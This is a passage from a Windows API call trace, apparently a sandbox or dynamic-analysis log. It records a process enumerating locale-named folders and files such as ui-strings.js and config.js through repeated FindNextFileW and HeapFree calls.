ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0174.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.447] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0174.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.447] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-br", cAlternateFileName="")) returned 1 [0174.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.452] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0174.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.452] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="root", cAlternateFileName="")) returned 1 [0174.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.452] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3379b53, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3379b53, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3379b53, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0174.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.453] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3379b53, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3379b53, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3379b53, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0174.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.456] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl-si", cAlternateFileName="")) returned 1 [0174.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.463] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0174.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.463] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3379b53, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3379b53, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3379b53, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv-se", cAlternateFileName="")) returned 1 [0174.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.463] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0174.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.464] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3379b53, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3379b53, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3379b53, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x4c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0174.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.464] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0174.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.464] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3379b53, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3379b53, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3379b53, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0174.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.464] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3379b53, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3379b53, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3379b53, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0174.465] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0174.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.467] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3379b53, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3379b53, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nls", cAlternateFileName="")) returned 0 [0174.467] FindClose (in: hFindFile=0x727588 | out: hFindFile=0x727588) returned 1 [0174.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.468] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3379b53, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3379b53, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3379b53, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dev", cAlternateFileName="")) returned 0 [0174.468] FindClose (in: hFindFile=0x7276c8 | out: hFindFile=0x7276c8) returned 1 [0174.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0174.468] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="app-api", cAlternateFileName="")) returned 1 [0174.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0174.471] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dev", cAlternateFileName="")) returned 0 [0174.471] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0174.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.471] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x593, dwReserved0=0x0, dwReserved1=0x0, cFileName="config.js", cAlternateFileName="")) returned 1 [0174.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.476] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca-es", cAlternateFileName="")) returned 1 [0174.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.477] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0174.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.478] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da-dk", cAlternateFileName="")) returned 1 [0174.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.478] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee81a6f4, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee81a6f4, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee81a6f4, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de-de", cAlternateFileName="")) returned 1 [0174.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.479] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7eca8e, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7eca8e, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7eca8e, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-ae", cAlternateFileName="")) returned 1 [0174.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.480] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee81a6f4, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee81a6f4, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee81a6f4, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-gb", cAlternateFileName="")) returned 1 [0174.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.481] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-il", cAlternateFileName="")) returned 1 [0174.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.482] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es-es", cAlternateFileName="")) returned 1 [0174.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.483] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu-es", cAlternateFileName="")) returned 1 [0174.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.849] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0174.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.853] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee81a6f4, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee81a6f4, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee81a6f4, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0174.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.855] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0174.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.857] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he-il", cAlternateFileName="")) returned 1 [0174.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.858] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0174.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.858] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0174.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.860] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7eca8e, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7eca8e, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7eca8e, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="it-it", cAlternateFileName="")) returned 1 [0174.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.860] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0174.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.861] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee81a6f4, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee81a6f4, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee81a6f4, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0174.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.863] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, 